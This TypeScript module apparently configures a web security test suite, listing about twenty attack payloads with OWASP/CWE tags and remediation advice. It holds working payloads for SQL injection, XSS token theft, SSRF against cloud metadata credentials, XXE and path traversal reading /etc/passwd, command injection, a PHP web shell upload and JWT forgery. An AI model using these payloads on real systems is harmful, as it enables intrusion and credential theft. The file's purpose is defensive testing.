export type HackingSeverity = 'critical' | 'high' | 'medium' | 'low' | 'info';

export type HackingTest = {
  id: string;
  name: string;
  severity: HackingSeverity;
  owasp: string;
  cwe: string;
  payload: string;
  remediation: string;
  description: string;
  tags: string[];
  enabled: boolean;
};

export const HACKING_TESTS: HackingTest[] = [
  {
    id: 'sqli-error',
    name: 'SQLi — Error Based',
    severity: 'critical',
    owasp: 'A03:2021',
    cwe: 'CWE-89',
    payload: "' AND 1=CONVERT(int,@@version)--",
    remediation: 'Use parameterized queries / prepared statements; validate and escape input; enforce least-privilege DB roles.',
    description: 'Triggers verbose SQL errors to enumerate DB engine and version.',
    tags: ['sqli', 'injection', 'database'],
    enabled: true,
  },
  {
    id: 'sqli-union',
    name: 'SQLi — Union Based',
    severity: 'critical',
    owasp: 'A03:2021',
    cwe: 'CWE-89',
    payload: "' UNION SELECT null,username,password FROM users--",
    remediation: 'Parameterized queries; strip UNION/SELECT from user-controlled concatenation; use ORM safely.',
    description: 'Exfiltrates data via UNION SELECT against crafted column count.',
    tags: ['sqli', 'union', 'injection'],
    enabled: true,
  },
  {
    id: 'sqli-blind',
    name: 'SQLi — Blind Boolean/Time',
    severity: 'high',
    owasp: 'A03:2021',
    cwe: 'CWE-89',
    payload: "' AND IF(SUBSTRING(password,1,1)='a',SLEEP(3),0)--",
    remediation: 'Parameterized queries; uniform error responses; rate limit DB-bound endpoints.',
    description: 'Infers data via boolean conditions and time delays without error output.',
    tags: ['sqli', 'blind', 'injection'],
    enabled: true,
  },
  {
    id: 'xss-reflected',
    name: 'XSS — Reflected',
    severity: 'high',
    owasp: 'A03:2021',
    cwe: 'CWE-79',
    payload: "<script>alert(document.domain)</script>",
    remediation: 'Context-aware output encoding; Content-Security-Policy; validate and escape reflected params.',
    description: 'Payload reflected from request into response without encoding.',
    tags: ['xss', 'reflected'],
    enabled: true,
  },
  {
    id: 'xss-stored',
    name: 'XSS — Stored',
    severity: 'critical',
    owasp: 'A03:2021',
    cwe: 'CWE-79',
    payload: "<img src=x onerror=alert(localStorage.getItem('token'))>",
    remediation: 'Sanitize stored content; encode on render; CSP with no inline scripts.',
    description: 'Persistent payload stored server-side and rendered to victims.',
    tags: ['xss', 'stored'],
    enabled: true,
  },
  {
    id: 'xss-dom',
    name: 'XSS — DOM Based',
    severity: 'high',
    owasp: 'A03:2021',
    cwe: 'CWE-79',
    payload: "#<img src=x onerror=alert(location.hash)>",
    remediation: 'Avoid innerHTML with untrusted data; use safe DOM APIs; sanitize client-side routing input.',
    description: 'Client-side sink consumes location.hash/search without sanitization.',
    tags: ['xss', 'dom'],
    enabled: false,
  },
  {
    id: 'ssrf-generic',
    name: 'SSRF — Generic',
    severity: 'high',
    owasp: 'A10:2021',
    cwe: 'CWE-918',
    payload: "url=http://127.0.0.1:8080/admin",
    remediation: 'Allow-list outbound URLs; disable URL fetching from user input; egress filtering.',
    description: 'Forces server to fetch arbitrary internal/external URLs.',
    tags: ['ssrf'],
    enabled: true,
  },
  {
    id: 'ssrf-cloud-metadata',
    name: 'SSRF — Cloud Metadata',
    severity: 'critical',
    owasp: 'A10:2021',
    cwe: 'CWE-918',
    payload: "url=http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    remediation: 'Block 169.254.169.254 at egress; require IMDSv2 with token; deny user-controlled fetch.',
    description: 'Exfiltrates cloud instance metadata and IAM credentials via link-local IP.',
    tags: ['ssrf', 'cloud', 'metadata'],
    enabled: true,
  },
  {
    id: 'xxe-classic',
    name: 'XXE — Classic',
    severity: 'high',
    owasp: 'A05:2021',
    cwe: 'CWE-611',
    payload: '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
    remediation: 'Disable external entities and DTDs; use JSON or hardened XML parser config.',
    description: 'External entity expansion reads server-side files.',
    tags: ['xxe', 'xml'],
    enabled: true,
  },
  {
    id: 'idor-object',
    name: 'IDOR — Insecure Direct Object Reference',
    severity: 'high',
    owasp: 'A01:2021',
    cwe: 'CWE-639',
    payload: "GET /api/users/1337 -> change to /api/users/1338",
    remediation: 'Enforce object-level authorization on every read/write; use indirect references.',
    description: 'Direct ID enumeration exposes other users objects without authz check.',
    tags: ['idor', 'access-control'],
    enabled: true,
  },
  {
    id: 'auth-bypass',
    name: 'Auth Bypass — Logic Flaw',
    severity: 'critical',
    owasp: 'A07:2021',
    cwe: 'CWE-287',
    payload: "POST /login {\"username\":\"admin\",\"password\":\"' OR '1'='1\"} or parameter pollution",
    remediation: 'Server-side session validation; constant-time checks; MFA where applicable.',
    description: 'Bypasses authentication via logic or parameter manipulation.',
    tags: ['auth', 'bypass'],
    enabled: true,
  },
  {
    id: 'directory-traversal',
    name: 'Directory Traversal',
    severity: 'high',
    owasp: 'A01:2021',
    cwe: 'CWE-22',
    payload: "../../etc/passwd%00 or ..%2F..%2F..%2Fetc%2Fpasswd",
    remediation: 'Canonicalize paths; restrict to sandbox dir; reject dot-dot sequences.',
    description: 'Escapes document root to read arbitrary filesystem files.',
    tags: ['traversal', 'path'],
    enabled: true,
  },
  {
    id: 'command-injection',
    name: 'Command Injection',
    severity: 'critical',
    owasp: 'A03:2021',
    cwe: 'CWE-78',
    payload: "; cat /etc/passwd; echo pwned",
    remediation: 'Avoid shell execution; use exec with arg arrays; strict allow-list validation.',
    description: 'Injects OS commands via unsanitized input concatenation.',
    tags: ['injection', 'command', 'rce'],
    enabled: true,
  },
  {
    id: 'open-redirect',
    name: 'Open Redirect',
    severity: 'medium',
    owasp: 'A01:2021',
    cwe: 'CWE-601',
    payload: "/redirect?url=https://evil.example.com",
    remediation: 'Validate redirect targets against allow-list; use relative redirects.',
    description: 'Redirects victim to attacker-controlled site for phishing.',
    tags: ['redirect', 'phishing'],
    enabled: true,
  },
  {
    id: 'csrf-token-missing',
    name: 'CSRF — Token Missing',
    severity: 'medium',
    owasp: 'A01:2021',
    cwe: 'CWE-352',
    payload: "<form action='https://target.example.com/transfer' method='POST'><input name='amount' value='1000'></form><script>forms[0].submit()</script>",
    remediation: 'Require per-session CSRF tokens; SameSite cookies; double-submit defense.',
    description: 'State-changing request without anti-CSRF token can be forged.',
    tags: ['csrf'],
    enabled: true,
  },
  {
    id: 'file-upload-rce',
    name: 'File Upload — Unrestricted / RCE',
    severity: 'critical',
    owasp: 'A08:2021',
    cwe: 'CWE-434',
    payload: "shell.php with <?php system($_GET['cmd']); ?> mime: image/jpeg",
    remediation: 'Verify content type and magic bytes; rename and store outside webroot; scan uploaded files.',
    description: 'Uploads executable file that grants remote code execution.',
    tags: ['upload', 'rce'],
    enabled: true,
  },
  {
    id: 'jwt-none-alg',
    name: 'JWT — None Algorithm / Weak Secret',
    severity: 'high',
    owasp: 'A02:2021',
    cwe: 'CWE-347',
    payload: "header: {\"alg\":\"none\"} or brute force HS256 with weak secret",
    remediation: 'Reject none alg; use strong random secrets; enforce RS256 with proper key validation.',
    description: 'Forges tokens via none algorithm or weak HMAC secret.',
    tags: ['jwt', 'auth'],
    enabled: true,
  },
  {
    id: 'jwt-kid-traversal',
    name: 'JWT — KID Path Traversal',
    severity: 'high',
    owasp: 'A02:2021',
    cwe: 'CWE-347',
    payload: "header kid: ../../../../dev/null brute or kid: file:///etc/passwd",
    remediation: 'Validate kid against allow-list; never use kid as filesystem path.',
    description: 'Abuses key ID header to traverse or inject verification keys.',
    tags: ['jwt', 'traversal'],
    enabled: false,
  },
  {
    id: 'graphql-introspection',
    name: 'GraphQL — Introspection & Batching Abuse',
    severity: 'medium',
    owasp: 'A05:2021',
    cwe: 'CWE-200',
    payload: "{ __schema { types { name fields { name } } } }",
    remediation: 'Disable introspection in prod; depth and complexity limits; query cost analysis.',
    description: 'Dumps schema via introspection; abuses batching for brute force.',
    tags: ['graphql', 'api'],
    enabled: true,
  },
  {
    id: 'graphql-dos',
    name: 'GraphQL — Deep Query DoS',
    severity: 'medium',
    owasp: 'A04:2021',
    cwe: 'CWE-400',
    payload: "query { users { posts { author { posts { author { posts { title } } } } } } }",
    remediation: 'Enforce max depth and complexity; pagination limits; timeout queries.',
    description: 'Deeply nested query causes resource exhaustion.',
    tags: ['graphql', 'dos'],
    enabled: false,
  },
  {
    id: 'prototype-pollution',
    name: 'Prototype Pollution',
    severity: 'high',
    owasp: 'A08:2021',
    cwe: 'CWE-1321',
    payload: "{\"__proto__\": {\"isAdmin\": true}} or ?__proto__[isAdmin]=true",
    remediation: 'Freeze Object.prototype; validate keys against __proto__/constructor/prototype; use Maps.',
    description: 'Pollutes JS prototype to escalate privileges or cause logic bypass.',
    tags: ['pollution', 'javascript'],
    enabled: true,
  },
  {
    id: 'ssti-template',
    name: 'SSTI — Server-Side Template Injection',
    severity: 'critical',
    owasp: 'A03:2021',
    cwe: 'CWE-94',
    payload: "{{7*7}} or {{config}} or ${7*7}",
    remediation: 'Sandbox templates; avoid rendering user input as template; use logic-less engines.',
    description: 'Injects template directives evaluated server-side for RCE.',
    tags: ['ssti', 'injection'],
    enabled: false,
  },
];

export const HACKING_OWASP_GROUPS = [...new Set(HACKING_TESTS.map((t) => t.owasp))].sort();

export function hackingStats() {
  return {
    total: HACKING_TESTS.length,
    critical: HACKING_TESTS.filter((t) => t.severity === 'critical').length,
    high: HACKING_TESTS.filter((t) => t.severity === 'high').length,
    enabled: HACKING_TESTS.filter((t) => t.enabled).length,
  };
}
